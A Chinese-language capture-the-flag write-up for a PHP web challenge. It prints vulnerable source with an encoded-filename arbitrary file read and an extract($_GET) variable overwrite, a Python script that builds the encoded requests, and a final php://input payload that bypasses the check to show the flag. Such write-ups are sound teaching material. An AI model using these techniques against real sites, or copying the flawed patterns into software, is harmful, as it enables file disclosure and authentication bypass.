听说有点坑
而且坑的一笔
抓包添加admin 得到源码
<?php
/*
* url
* Date: July 4,2018
*/
error_reporting(E_ALL || ~E_NOTICE);
header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
header('Refresh:0;url=./index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09');
$file = hex2bin(base64_decode(base64_decode($_GET['jpg'])));
echo '<title>'.$_GET['jpg'].'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
echo $file.'</br>';
$file = str_replace("config","!", $file);
echo $file.'</br>';
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
* Can you find the flag file?
*
*/
?>
这题的坑点在在于
practice.txt.swp
写一个简单的脚本
用来代替浏览器构造访问
import base64
import requests
def encode2(str1):
return (base64.b64encode(base64.b64encode(str1.encode('hex'))))
def get1(str1):
url = 'http://url/index.php?jpg='+encode2(str1)
print str1,url
req = requests.get(url)
print req.text
get1('practice.txt.swp')
get1('f1agconfigddctf.php')
ZjFhZyFkZGN0Zi5waHA=
base64 解密
!用config替换
f1ag!ddctf.php
得到
f1agconfigddctf.php
<?php
include('config.php');
$k = 'hello';
extract($_GET);
if(isset($uid))
{
$content=trim(file_get_contents($k));
if($uid==$content)
{
echo $flag;
}
else
{
echo'hello';
}
}
?>
这里存在一个绕过
可以使用php://
最终的payload
http://url/f1ag!ddctf.php?uid=&k=php://input